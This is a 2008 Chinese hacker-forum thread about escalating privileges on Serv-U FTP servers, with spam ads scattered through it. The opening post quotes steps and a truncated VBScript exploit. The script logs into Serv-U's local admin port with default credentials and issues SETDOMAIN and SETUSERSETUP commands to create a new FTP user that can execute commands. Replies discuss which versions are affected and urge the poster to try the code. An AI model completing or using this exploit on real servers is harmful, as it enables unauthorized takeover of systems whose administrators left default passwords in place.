【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]最近传闻的 SERV-U 6.4提权方法通杀SERV-U版本 [打印本页]

作者: 冰绿茶 时间: 2008-7-24 17:19 标题: [讨论]最近传闻的 SERV-U 6.4提权方法通杀SERV-U版本

[讨论]最近传闻的 SERV-U 6.4提权方法通杀SERV-U版本
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
议题作者：csfs
引用:
SERV-U 6.4提权方法通杀SERV-U版本
修改ftpport为21

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以

执行命令的用户.....有个这个用户什么不能做哈.....
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
最近网上出了新提权法.
我不怎么明白?有谁成功了,最好做个动画看看!~
帖子1 精华2 积分22 阅读权限40 性别男在线时间7 小时注册时间2007-9-14 最后登录2008-3-18 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

hack520

运维管理组

作者: 阿一 时间: 2008-7-24 17:19

密码改了还是没有什么用的,这个方法只能针对密码没有改的6.4版本,当然,以前的版本也可以这样搞.Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男在线时间576 小时注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

kazhi12

晶莹剔透§烈日灼然

作者: 1600cc 时间: 2008-7-24 17:19

1.serv-u永远是好东西
2.lz代码都有了自己试验下不就行还看什么动画

我讲你来的时候我会让你的鲜血顺着我的刀流下

帖子7 精华0 积分22 阅读权限40 性别男来自地球在线时间14 小时注册时间2006-5-15 最后登录2008-4-18 查看详细资料TOP 爱要怎么说出口

上帝在堕落

晶莹剔透§烈日灼然

作者: 佛硬 时间: 2008-7-24 17:19

这方面的文章太多了，你baidu下，serv~u的本地提权都是基于默认密码的，改了密码就不用想了，但在5.0版本有个远程提权，但必须你有个ftp帐户。赠人玫瑰，手留余香。

帖子41 精华0 积分131 阅读权限40 性别男在线时间65 小时注册时间2007-5-21 最后登录2008-6-21 查看详细资料TOP

sunue

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)